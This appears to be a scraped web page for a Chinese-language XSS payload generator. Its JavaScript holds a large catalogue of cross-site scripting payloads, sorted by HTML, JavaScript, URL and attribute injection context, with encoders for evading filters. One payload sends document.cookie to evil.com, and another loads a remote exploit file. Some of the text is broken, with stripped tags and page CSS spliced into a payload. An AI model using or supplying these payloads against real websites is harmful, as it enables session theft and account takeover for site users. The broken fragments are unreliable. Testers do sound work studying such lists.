🔧 XSS Payload生成器

按上下文生成XSS Payload · HTML/JS/URL编码转换·自定义注入

1. 选择上下文

2. 选择子类型

3. 编码转换

4. 自定义注入点（可选）

替换 payload 中的 [XSS] 标记：

生成的 Payloads

', '

', '', '', '

', '

',
      '<video><source onerror=[XSS]>',
      '<audio src=x onerror=[XSS]>',
      '<iframe srcdoc="<script>[XSS]<\/script>">',
      '<marquee onstart=[XSS]>',
      '<isindex type=submit onmouseover=[XSS]>',
      '<a href="javascript:[XSS]">click</a>',
      '<form action="javascript:[XSS]"><button>submit</button></form>',
    ],
    '注释绕过': [
      '--><script>[XSS]</script><script>[XSS]</script><!--',
    ],
    '闭合标签': [
      '"/><script>[XSS]</script>',
      "\\'><script>[XSS]</script>",
      '></script><script>[XSS]</script>',
    ],
    '无script方案': [
      '<img src=x onerror=alert(1)>',
      '<svg onload=alert(1)>',
      '<body onload=alert(1)>',
      '<input autofocus onfocus=alert(1)>',
      '<details open ontoggle=alert(1)>',
      '<object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==">',
      '<embed src="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==">',
      '<link rel="stylesheet" href="javascript:alert(1)">',
      '<style>

.tool-header{padding:24px 24px 12px;background:var(--card);border-bottom:1px solid var(--border)}
.tool-header h1{font-size:24px;font-weight:700;color:var(--text);margin:0 0 4px}
.tool-header p{font-size:13px;color:var(--text-dim);margin:0}
.breadcrumb-bar{display:flex;align-items:center;padding:6px 24px;background:var(--bg);border-bottom:1px solid var(--border);gap:8px;font-size:13px}
.breadcrumb-bar .back-btn{color:var(--accent);text-decoration:none;font-weight:500;padding:2px 8px;border-radius:4px;border:1px solid var(--accent)}
.breadcrumb-bar .back-btn:hover{background:rgba(99,102,241,0.1)}
.breadcrumb-bar .sep{color:var(--text-dim)}
.breadcrumb-bar a{color:var(--text-dim);text-decoration:none}
.breadcrumb-bar a:hover{color:var(--accent)}
.breadcrumb-bar span{color:var(--text);font-weight:500}

.header .back-btn{color:var(--accent);text-decoration:none;font-size:20px;padding:2px 6px;border-radius:4px;line-height:1}
.header .back-btn:hover{background:rgba(99,102,241,0.1)}
.header .breadcrumb{font-size:13px;color:var(--text-dim);display:flex;align-items:center;gap:4px}
.header .breadcrumb a{color:var(--text-dim);text-decoration:none}
.header .breadcrumb a:hover{color:var(--accent)}
.header .breadcrumb span{color:var(--text);font-weight:500}
.header .header-right{margin-left:auto;display:flex;align-items:center}
.header .header-right h1{font-size:15px;font-weight:700;margin:0}
.header .header-right h1 span:first-child{color:var(--accent)}
.header .header-right a{text-decoration:none;color:inherit}
@import "javascript:alert(1)"</style>',
    ],
  },
  js: {
    '字符串上下文': [
      "';[XSS];//",
      '";[XSS];//',
      "`;[XSS];//",
      "\\';[XSS];//",
      "';[XSS];document.cookie;//",
      '";[XSS];new Image().src="http://evil.com/?c="+document.cookie;//',
    ],
    '事件处理器': [
      'onload=[XSS]',
      'onerror=[XSS]',
      'onclick=[XSS]',
      'onmouseover=[XSS]',
      'onfocus=[XSS]',
      'onblur=[XSS]',
      'onsubmit=[XSS]',
      'onchange=[XSS]',
    ],
    '模板字面量': [
      '${[XSS]}',
      '`${[XSS]}`',
      '${7*7}',
      '${document.domain}',
    ],
    'eval 链': [
      'eval("[XSS]")',
      'setTimeout("[XSS]",0)',
      'setInterval("[XSS]",1)',
      'Function("[XSS]")()',
      'setTimeout(atob("base64encoded"),0)',
    ],
  },
  url: {
    'javascript: 伪协议': [
      'javascript:[XSS]',
      'javascript:alert(1)',
      'javascript://%0aalert(1)',
      'JaVasCriPt:[XSS]',
      'javascript:void(alert(1))',
    ],
    'data: 协议': [
      "data:text/html,<script>[XSS]</script>",
      'data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==',
      'data:text/html;base64,[XSS_BASE64]',
    ],
    'URL 参数注入': [
      '?q="><script>[XSS]</script>',
      '?q=<img src=x onerror=[XSS]>',
      '?q=<svg onload=[XSS]>',
      '#<script>[XSS]</script>',
    ],
  },
  attr: {
    '属性值注入': [
      '" autofocus onfocus=[XSS] "',
      '" onmouseover=[XSS] "',
      '" onclick=[XSS] "',
      '" style="x:expression([XSS])"',
      '" accesskey="x" onclick=[XSS] "',
    ],
    'href/src 注入': [
      'javascript:[XSS]',
      'jav	ascript:[XSS]',
      'jav
ascript:[XSS]',
      'javascript:[XSS]',
      '   javascript:[XSS]',
    ],
    'style 属性': [
      'background:url("javascript:[XSS]")',
      'background:expression([XSS])',
      '-moz-binding:url("http://evil.com/exploit.xml#xss")',
    ],
  }
};

const ENCODERS = {
  none: s=>s,
  url: s=>encodeURIComponent(s),
  html: s=>s.replace(/&/g,'&').replace(/</g,'<').replace(/>/g,'>').replace(/"/g,'"').replace(/'/g,'''),
  unicode: s=>[...s].map(c=>'\\u'+c.charCodeAt(0).toString(16).padStart(4,'0')).join(''),
  hex: s=>[...s].map(c=>'\\x'+c.charCodeAt(0).toString(16).padStart(2,'0')).join(''),
  base64: s=>btoa(unescape(encodeURIComponent(s))),
};

let currentCtx = 'html';
let currentSubtype = '';

function getSubtypes(ctx) {
  return Object.keys(PAYLOADS[ctx]||{});
}

function escapeHtml(s) {
  return s.replace(/&/g,'&').replace(/</g,'<').replace(/>/g,'>').replace(/"/g,'"');
}

function copyPayload(btn) {
  const text = btn.dataset.text;
  // Decode HTML entities from dataset
  const txt = document.createElement('textarea');
  txt.value = text;
  document.body.appendChild(txt);
  txt.select();
  document.execCommand('copy');
  document.body.removeChild(txt);
  btn.textContent = '已复制!';
  btn.classList.add('copied');
  setTimeout(()=>{btn.textContent='复制';btn.classList.remove('copied');},1500);
}

// Init
document.querySelectorAll('#contextBtns .tag-btn').forEach(btn => {
  btn.addEventListener('click', () => {
    document.querySelectorAll('#contextBtns .tag-btn').forEach(b=>b.classList.remove('active'));
    btn.classList.add('active');
    currentCtx = btn.dataset.ctx;
    renderSubtypes(currentCtx);
  });
});

document.querySelectorAll('.encoding-btn').forEach(btn => {
  btn.addEventListener('click', () => {
    document.querySelectorAll('.encoding-btn').forEach(b=>b.classList.remove('active'));
    btn.classList.add('active');
    // Re-render
    const activeSub = document.querySelector('#subtypeBtns .tag-btn.active');
    if (activeSub) renderPayloads(currentCtx, activeSub.dataset.sub);
  });
});

document.getElementById('injectPoint').addEventListener('input', () => {
  const activeSub = document.querySelector('#subtypeBtns .tag-btn.active');
  if (activeSub) renderPayloads(currentCtx, activeSub.dataset.sub);
});

// Init first context
renderSubtypes('html');
</script>
<script src="/feedback-widget.js"></script>